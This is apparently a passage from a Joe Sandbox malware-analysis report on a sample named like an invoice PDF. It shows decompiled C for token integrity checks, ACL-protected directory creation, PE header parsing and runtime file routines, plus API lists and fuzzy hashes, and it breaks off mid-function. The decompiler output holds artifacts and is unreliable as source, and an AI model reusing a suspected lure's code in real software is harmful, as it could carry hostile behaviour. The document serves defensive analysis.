				_v12 = 0;
				_v4 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t22 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
					if(_t22 != 0 || GetLastError() == 0x7a) {
						_push(_v16);
						_push(1);
						_t30 = E013197F8(_t28);
						_t32 =  &(_t32[2]);
						if(_t30 != 0) {
							_t25 = GetTokenInformation(_v12, 1, _t30, _v16,  &_v16); // executed
							if(_t25 != 0) {
								_push( &_v12);
								_push( *_t30);
								L01317858();
							}
						}
					}
				}
				L01319803(_t30);
				_t18 = _v8;
				if(_t18 != 0xffffffff) {
					CloseHandle(_t18);
				}
				return _v4;
			}













                            0x01314920
                            0x01314928
                            0x01314931
                            0x01314933
                            0x0131493d
                            0x01314950
                            0x0131495f
                            0x01314967
                            0x01314974
                            0x01314978
                            0x0131497f
                            0x01314981
                            0x01314986
                            0x01314998
                            0x013149a0
                            0x013149a6
                            0x013149a7
                            0x013149a9
                            0x013149a9
                            0x013149a0
                            0x01314986
                            0x01314967
                            0x013149af
                            0x013149b4
                            0x013149bf
                            0x013149c2
                            0x013149c2
                            0x013149cf

                            APIs
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                            • OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                            • GetLastError.KERNEL32 ref: 01314969
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                            • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                            • String ID:
                            • API String ID: 995526605-0
                            • Opcode ID: abff934a130d33af1f3b9332b411498b34e348c715207fa55d64e4e554dc1722
                            • Instruction ID: 7b28f13aee81c888c5d56308a413377144d6b4a1f27dc37cd08678112421f0a0
                            • Opcode Fuzzy Hash: abff934a130d33af1f3b9332b411498b34e348c715207fa55d64e4e554dc1722
                            • Instruction Fuzzy Hash: 1F11CE70504211BBDA249F68DD48B5FBFADAF40764F004928F988D1098D730C448CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311320, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 83%
                            			E01311320(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t7;
				signed int _t9;
				void* _t10;
				signed int _t15;
				signed int _t17;
				void* _t19;
				intOrPtr _t27;
				signed int _t28;
				intOrPtr _t29;
				signed int _t30;
				void* _t31;

				_t21 = __edx;
				_t20 = __ecx;
				_t29 =  *((intOrPtr*)(_t31 + 0x10));
				_t27 =  *((intOrPtr*)(_t31 + 0x10));
				_push(_t29);
				_push(_t27);
				_t19 = E01311220(__ecx, __edx);
				_t7 = E01313C20(__edx, _t27);
				if(_t7 != 0xffffffff) {
					_t3 = _t29 + 0x12; // 0x12
					_t23 = _t3;
					_t4 = _t27 + 0x2068; // 0x2068
					_push(_t3);
					_t9 = E01313EF0(_t19, _t3, __eflags);
					_t28 = _t9;
					_push( *((intOrPtr*)(_t29 + 0xc)));
					L01317864();
					_t30 = _t9;
					__eflags = _t28;
					if(__eflags != 0) {
						_t10 = E0131A6CB(_t20, _t19, _t30, 1, _t28); // executed
						__eflags = _t10 - 1;
						if(__eflags == 0) {
							L7:
							_push(_t28); // executed
							E01319889(_t20, _t21, __eflags); // executed
							L01319803(_t19); // executed
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t30;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t15 = E013117B0(__eflags, "fwrite", "Failed to write all bytes for %s\n", _t23) | 0xffffffff;
								__eflags = _t15;
								return _t15;
							}
						}
					} else {
						_t17 = E013117B0(__eflags, "fopen", "%s could not be extracted!\n", _t23) | 0xffffffff;
						__eflags = _t17;
						return _t17;
					}
				} else {
					return _t7;
				}
			}

















                            0x01311320
                            0x01311320
                            0x01311322
                            0x01311327
                            0x0131132b
                            0x0131132c
                            0x01311333
                            0x01311335
                            0x01311340
                            0x01311349
                            0x01311349
                            0x0131134c
                            0x01311352
                            0x01311354
                            0x0131135c
                            0x0131135e
                            0x01311361
                            0x01311366
                            0x01311368
                            0x0131136a
                            0x0131138c
                            0x01311394
                            0x01311397
                            0x013113b8
                            0x013113b8
                            0x013113b9
                            0x013113bf
                            0x013113c7
                            0x013113cd
                            0x01311399
                            0x01311399
                            0x0131139b
                            0x00000000
                            0x0131139d
                            0x013113b0
                            0x013113b0
                            0x013113b7
                            0x013113b7
                            0x0131139b
                            0x0131136c
                            0x0131137f
                            0x0131137f
                            0x01311386
                            0x01311386
                            0x01311344
                            0x01311347
                            0x01311347

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %s could not be extracted!$Failed to write all bytes for %s$fopen$fwrite
                            • API String ID: 2009864989-741305175
                            • Opcode ID: 0cf4718d8c7ab291e11da03c5cd514f4812ade174abcfcfd80dac30e57e5753a
                            • Instruction ID: 94b33d94137b5d2a63d3e381a4a4eca97b48a03033c3dc71815f33641ac37000
                            • Opcode Fuzzy Hash: 0cf4718d8c7ab291e11da03c5cd514f4812ade174abcfcfd80dac30e57e5753a
                            • Instruction Fuzzy Hash: E5110473A4131923CA2831BE7C45CEB375DCED267EB040B76FA20D2649FA52951442B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314B30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 72%
                            			E01314B30(char _a4, intOrPtr _a8, char _a12, void* _a8188, signed int _a8204, WCHAR* _a8212) {
				intOrPtr _v0;
				struct _SECURITY_ATTRIBUTES _v16;
				signed int _t12;
				signed int _t19;
				signed int _t21;
				WCHAR* _t33;
				void* _t37;
				signed int _t40;

				E01317880();
				_t12 =  *0x133c008; // 0xa3433343
				_a8204 = _t12 ^ _t40;
				_t33 = _a8212;
				_t37 = E01314920();
				_t27 =  !=  ? _t37 : L"S-1-3-4";
				E013149D0( &_a12, 0x1000, L"D:(A;;FA;;;%s)",  !=  ? _t37 : L"S-1-3-4");
				LocalFree(_t37);
				_push(0);
				_v0 = 0xc;
				_push( &_a4);
				_push(1);
				_t19 =  &_a12;
				_a8 = 0;
				_push(_t19); // executed
				L0131785E(); // executed
				if(_t19 != 0) {
					_t21 = CreateDirectoryW(_t33,  &_v16); // executed
					asm("sbb eax, eax");
					E0131786A();
					return  ~( ~_t21) - 1;
				} else {
					E0131786A();
					return _t19 | 0xffffffff;
				}
			}











                            0x01314b35
                            0x01314b3a
                            0x01314b41
                            0x01314b4a
                            0x01314b56
                            0x01314b63
                            0x01314b72
                            0x01314b7b
                            0x01314b81
                            0x01314b87
                            0x01314b8f
                            0x01314b90
                            0x01314b92
                            0x01314b96
                            0x01314b9e
                            0x01314b9f
                            0x01314ba6
                            0x01314bc8
                            0x01314bd8
                            0x01314be0
                            0x01314beb
                            0x01314ba8
                            0x01314bb6
                            0x01314bc1
                            0x01314bc1

                            APIs
                              • Part of subcall function 01314920: GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                              • Part of subcall function 01314920: OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                              • Part of subcall function 01314920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                              • Part of subcall function 01314920: GetLastError.KERNEL32 ref: 01314969
                              • Part of subcall function 01314920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                              • Part of subcall function 01314920: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                              • Part of subcall function 01314920: CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            • LocalFree.KERNEL32(00000000,01313D37,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01314B7B
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 01314B9F
                            • CreateDirectoryW.KERNELBASE(?,?,?), ref: 01314BC8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                            • API String ID: 4998090-2855260032
                            • Opcode ID: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction ID: d31da858ae76d3a8675c1b08c6ea0583cebb53ffa34459a206c86423f75a16da
                            • Opcode Fuzzy Hash: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction Fuzzy Hash: 0211A9716043019BE628EB29DC49BAB77D9EF84714F404A1EF845C62C5D6349904CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311120, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 362 1311120-1311153 call 1319f16 call 1319b2b 367 13111f2-13111f7 362->367 368 1311159-131115c 362->368 368->367 369 1311162-1311189 call 1319f16 call 1319b2b call 1319f16 368->369 375 131118e-13111a8 call 1319b2b 369->375 375->367 378 13111aa-13111ad 375->378 379 13111b6-13111b9 378->379 380 13111af-13111b4 378->380 379->367 382 13111bb 379->382 381 13111c0-13111f1 call 1319f16 call 1319b2b 380->381 382->381
                            C-Code - Quality: 100%
                            			E01311120(void* __edx, void* _a4) {
				char _v4;
				signed int _t15;
				intOrPtr _t30;
				signed int _t32;

				_t34 = __edx;
				_t35 = _a4;
				_v4 = 0;
				E01319F16(__edx,  *_a4, 0, 0); // executed
				E01319B2B( &_a4, 1, 2,  *_a4); // executed
				_t15 = _a4;
				if(_t15 != 0x4d || _t15 != 0x5a) {
					L8:
					return _t15 | 0xffffffff;
				} else {
					E01319F16(__edx,  *_t35, 0x3c, 0); // executed
					E01319B2B( &_v4, 4, 1,  *_t35);
					E01319F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
					E01319B2B( &_a4, 2, 1,  *_t35);
					_t15 = _a4;
					if(_t15 != 0xb) {
						goto L8;
					} else {
						if(_t15 != 1) {
							if(_t15 != 2) {
								goto L8;
							} else {
								_t32 = 0xa8;
								goto L7;
							}
						} else {
							_t32 = 0x98;
							L7:
							E01319F16(_t34,  *_t35, _v4 + _t32, 0);
							E01319B2B( &_v4, 4, 1,  *_t35);
							_t30 = _v4;
							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
							return  ==  ? _t32 | 0xffffffff : _t30;
						}
					}
				}
			}







                            0x01311120
                            0x01311122
                            0x0131112a
                            0x01311134
                            0x01311144
                            0x01311149
                            0x01311153
                            0x013111f2
                            0x013111f7
                            0x01311162
                            0x01311168
                            0x01311178
                            0x01311189
                            0x01311199
                            0x0131119e
                            0x013111a8
                            0x00000000
                            0x013111aa
                            0x013111ad
                            0x013111b9
                            0x00000000
                            0x013111bb
                            0x013111bb
                            0x00000000
                            0x013111bb
                            0x013111af
                            0x013111af
                            0x013111c0
                            0x013111cb
                            0x013111db
                            0x013111e0
                            0x013111ec
                            0x013111f1
                            0x013111f1
                            0x013111ad
                            0x013111a8

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction ID: 927cdc730b5f5fe74c634d5fdd7f43d72af10de816f2be815dc7d3c837cf70cc
                            • Opcode Fuzzy Hash: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction Fuzzy Hash: 49210571644302BAEE346F2CCC42F96B399EF4471CF50492DF3D0AA1DAD6B2D8458B46
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132308B, Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 387 132308b-13230b0 388 13230b2-13230b4 387->388 389 13230b9-13230bb 387->389 390 1323287-1323296 call 131786a 388->390 391 13230dc-1323101 389->391 392 13230bd-13230d7 call 131c9bb call 131c9ce call 1321788 389->392 394 1323103-1323106 391->394 395 1323108-132310e 391->395 392->390 394->395 398 1323130-1323135 394->398 399 1323110-1323128 call 131c9bb call 131c9ce call 1321788 395->399 400 132312d 395->400 403 1323146-132314f call 1322c30 398->403 404 1323137-1323143 call 1322807 398->404 435 132327e-1323281 399->435 400->398 416 1323151-1323153 403->416 417 132318a-132319c 403->417 404->403 421 1323177-1323180 call 1322a10 416->421 422 1323155-132315a 416->422 419 13231e4-1323205 WriteFile 417->419 420 132319e-13231a4 417->420 424 1323210 419->424 425 1323207-132320d GetLastError 419->425 427 13231a6-13231a9 420->427 428 13231d4-13231e2 call 1322ca6 420->428 436 1323185-1323188 421->436 429 1323160-132316d call 1322bc3 422->429 430 132324e-1323260 422->430 437 1323213-132321e 424->437 425->424 438 13231c4-13231d2 call 1322e73 427->438 439 13231ab-13231ae 427->439 428->436 444 1323170-1323172 429->444 433 1323262-1323265 430->433 434 132326b-132327b call 131c9ce call 131c9bb 430->434 433->434 442 1323267-1323269 433->442 434->435 448 1323286 435->448 436->444 445 1323283 437->445 446 1323220-1323225 437->446 438->436 439->430 447 13231b4-13231c2 call 1322d85 439->447 442->448 444->437 445->448 451 1323227-132322c 446->451 452 132324b 446->452 447->436 448->390 456 1323242-1323249 call 131c998 451->456 457 132322e-1323240 call 131c9ce call 131c9bb 451->457 452->430 456->435 457->435
                            C-Code - Quality: 97%
                            			E0132308B(signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t78;
				signed int _t80;
				signed int _t84;
				signed int _t87;
				signed int _t101;
				signed int _t102;
				signed int _t105;
				intOrPtr _t107;
				signed int _t112;
				signed int _t114;
				void* _t116;
				signed int _t120;
				signed int _t123;
				signed int _t125;
				void* _t126;

				_t62 =  *0x133c008; // 0xa3433343
				_v8 = _t62 ^ _t125;
				_t105 = _a12;
				_v12 = _t105;
				_t120 = _a4;
				_t116 = _a8;
				_v52 = _t116;
				if(_t105 != 0) {
					__eflags = _t116;
					if(_t116 != 0) {
						_t101 = _t120 >> 6;
						_t114 = (_t120 & 0x0000003f) * 0x30;
						_v32 = _t101;
						_t66 =  *((intOrPtr*)(0x1346108 + _t101 * 4));
						_v48 = _t66;
						_v28 = _t114;
						_t102 =  *((intOrPtr*)(_t66 + _t114 + 0x29));
						__eflags = _t102 - 2;
						if(_t102 == 2) {
							L6:
							_t68 =  !_t105;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t114 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E01322807(_t120, 0, 0, 2);
									_t126 = _t126 + 0x10;
								}
								_t69 = E01322C30(_t102, _t114, __eflags, _t120);
								__eflags = _t69;
								if(_t69 == 0) {
									_t107 =  *((intOrPtr*)(0x1346108 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t107 + _t71 + 0x28) & 0x00000080;
									if(( *(_t107 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t107 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t84 = _t102;
									__eflags = _t84;
									if(_t84 == 0) {
										E01322CA6( &_v24, _t120, _t116, _v12);
										goto L17;
									}
									_t87 = _t84 - 1;
									__eflags = _t87;
									if(_t87 == 0) {
										_t86 = E01322E73( &_v24, _t120, _t116, _v12);
										goto L17;
									}
									__eflags = _t87 != 1;
									if(_t87 != 1) {
										goto L34;
									}
									_t86 = E01322D85( &_v24, _t120, _t116, _v12);
									goto L17;
								} else {
									__eflags = _t102;
									if(_t102 == 0) {
										_t86 = E01322A10( &_v24, _t120, _t116, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											_t75 = _t74 - _v36;
											__eflags = _t75;
											L40:
											L41:
											E0131786A();
											return _t75;
										}
										_t76 = _v44;
										__eflags = _t76;
										if(_t76 == 0) {
											_t116 = _v52;
											L34:
											_t112 = _v28;
											_t78 =  *((intOrPtr*)(0x1346108 + _v32 * 4));
											__eflags =  *(_t78 + _t112 + 0x28) & 0x00000040;
											if(( *(_t78 + _t112 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E0131C9CE())) = 0x1c;
												_t80 = E0131C9BB();
												 *_t80 =  *_t80 & 0x00000000;
												__eflags =  *_t80;
												L38:
												_t75 = _t80 | 0xffffffff;
												goto L40;
											}
											__eflags =  *_t116 - 0x1a;
											if( *_t116 != 0x1a) {
												goto L37;
											}
											_t75 = 0;
											goto L40;
										}
										_t123 = 5;
										__eflags = _t76 - _t123;
										if(_t76 != _t123) {
											_t80 = E0131C998(_t76);
										} else {
											 *((intOrPtr*)(E0131C9CE())) = 9;
											_t80 = E0131C9BB();
											 *_t80 = _t123;
										}
										goto L38;
									}
									__eflags = _t102 - 1 - 1;
									if(_t102 - 1 > 1) {
										goto L34;
									}
									E01322BC3( &_v24, _t116, _v12);
									goto L15;
								}
							}
							 *(E0131C9BB()) =  *_t94 & 0x00000000;
							 *((intOrPtr*)(E0131C9CE())) = 0x16;
							_t80 = E01321788();
							goto L38;
						}
						__eflags = _t102 - 1;
						if(_t102 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E0131C9BB()) =  *_t96 & _t116;
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					_t75 = E01321788() | 0xffffffff;
					goto L41;
				}
				_t75 = 0;
				goto L41;
			}








































                            0x01323093
                            0x0132309a
                            0x0132309d
                            0x013230a0
                            0x013230a4
                            0x013230a8
                            0x013230ab
                            0x013230b0
                            0x013230b9
                            0x013230bb
                            0x013230e1
                            0x013230e7
                            0x013230ea
                            0x013230ed
                            0x013230f4
                            0x013230f7
                            0x013230fa
                            0x013230fe
                            0x01323101
                            0x01323108
                            0x0132310a
                            0x0132310c
                            0x0132310e
                            0x0132312d
                            0x01323130
                            0x01323130
                            0x01323135
                            0x0132313e
                            0x01323143
                            0x01323143
                            0x01323147
                            0x0132314d
                            0x0132314f
                            0x0132318d
                            0x01323194
                            0x01323197
                            0x0132319c
                            0x013231eb
                            0x013231ee
                            0x013231f1
                            0x013231fd
                            0x01323203
                            0x01323205
                            0x0132320d
                            0x0132320d
                            0x00000000
                            0x01323210
                            0x013231a1
                            0x013231a1
                            0x013231a4
                            0x013231dd
                            0x00000000
                            0x013231dd
                            0x013231a6
                            0x013231a6
                            0x013231a9
                            0x013231cd
                            0x00000000
                            0x013231cd
                            0x013231ab
                            0x013231ae
                            0x00000000
                            0x00000000
                            0x013231bd
                            0x00000000
                            0x01323151
                            0x01323151
                            0x01323153
                            0x01323180
                            0x01323185
                            0x01323170
                            0x01323213
                            0x01323216
                            0x01323217
                            0x01323218
                            0x01323219
                            0x0132321c
                            0x0132321e
                            0x01323283
                            0x01323283
                            0x01323286
                            0x01323287
                            0x0132328e
                            0x01323296
                            0x01323296
                            0x01323220
                            0x01323223
                            0x01323225
                            0x0132324b
                            0x0132324e
                            0x01323251
                            0x01323254
                            0x0132325b
                            0x01323260
                            0x0132326b
                            0x01323270
                            0x01323276
                            0x0132327b
                            0x0132327b
                            0x0132327e
                            0x0132327e
                            0x00000000
                            0x0132327e
                            0x01323262
                            0x01323265
                            0x00000000
                            0x00000000
                            0x01323267
                            0x00000000
                            0x01323267
                            0x01323229
                            0x0132322a
                            0x0132322c
                            0x01323243
                            0x0132322e
                            0x01323233
                            0x01323239
                            0x0132323e
                            0x0132323e
                            0x00000000
                            0x0132322c
                            0x01323157
                            0x0132315a
                            0x00000000
                            0x00000000
                            0x01323168
                            0x00000000
                            0x0132316d
                            0x0132314f
                            0x01323115
                            0x0132311d
                            0x01323123
                            0x00000000
                            0x01323123
                            0x01323103
                            0x01323106
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01323106
                            0x013230c2
                            0x013230c9
                            0x013230d4
                            0x00000000
                            0x013230d4
                            0x013230b2
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23a007b3360491f211ecac2786da4701ff0ccb33a80cb15831347a14ca487af5
                            • Instruction ID: 197e4db1c21ffd00655135ca01fdd714c76c637ae47ffdd0b6edec63a9e483c2
                            • Opcode Fuzzy Hash: 23a007b3360491f211ecac2786da4701ff0ccb33a80cb15831347a14ca487af5
                            • Instruction Fuzzy Hash: 9151C471D0022AABDF25BFADCC44FAEBBB9FF0A718F140119E501A7291D7789901CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013218F4, Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 466 13218f4-1321908 call 131e926 469 132190a-132190c 466->469 470 132190e-1321916 466->470 471 132195c-132197c call 131e895 469->471 472 1321921-1321924 470->472 473 1321918-132191f 470->473 483 132198a 471->483 484 132197e-1321988 call 131c998 471->484 474 1321942-1321952 call 131e926 FindCloseChangeNotification 472->474 475 1321926-132192a 472->475 473->472 477 132192c-1321940 call 131e926 * 2 473->477 474->469 487 1321954-132195a GetLastError 474->487 475->474 475->477 477->469 477->474 485 132198c-132198f 483->485 484->485 487->471
                            C-Code - Quality: 100%
                            			E013218F4(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E0131E926(_t33) != 0xffffffff) {
					_t13 =  *0x1346108; // 0x105eaf0
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E0131E926(2);
						if(E0131E926(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E0131E926(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E0131E895(_t33);
						 *((char*)( *((intOrPtr*)(0x1346108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E0131C998(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}








                            0x013218fb
                            0x01321908
                            0x0132190e
                            0x01321916
                            0x01321924
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132192c
                            0x0132192c
                            0x0132192e
                            0x01321940
                            0x00000000
                            0x00000000
                            0x01321942
                            0x0132194a
                            0x01321952
                            0x00000000
                            0x00000000
                            0x0132195a
                            0x0132195c
                            0x0132195d
                            0x01321975
                            0x0132197c
                            0x00000000
                            0x0132198a
                            0x00000000
                            0x01321985
                            0x01321916
                            0x0132190a
                            0x0132190a
                            0x00000000

                            APIs
                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,01321812,?), ref: 0132194A
                            • GetLastError.KERNEL32(?,01321812,?), ref: 01321954
                            • __dosmaperr.LIBCMT ref: 0132197F
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction ID: 7712a720c87032ec3d63ec1deb2b8941de7effacdfa71fff847beda122c05e30
                            • Opcode Fuzzy Hash: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction Fuzzy Hash: E1016133B0423517DBBA323CA94477DAB4E8B8677CF250129ED09CB1C6DE65D88182D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132276E, Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 491 132276e-1322786 call 131e926 494 1322788-132278d call 131c9ce 491->494 495 1322799-13227af SetFilePointerEx 491->495 500 1322793-1322797 494->500 497 13227c0-13227ca 495->497 498 13227b1-13227be GetLastError call 131c998 495->498 497->500 501 13227cc-13227e1 497->501 498->500 504 13227e6-13227eb 500->504 501->504
                            C-Code - Quality: 86%
                            			E0132276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
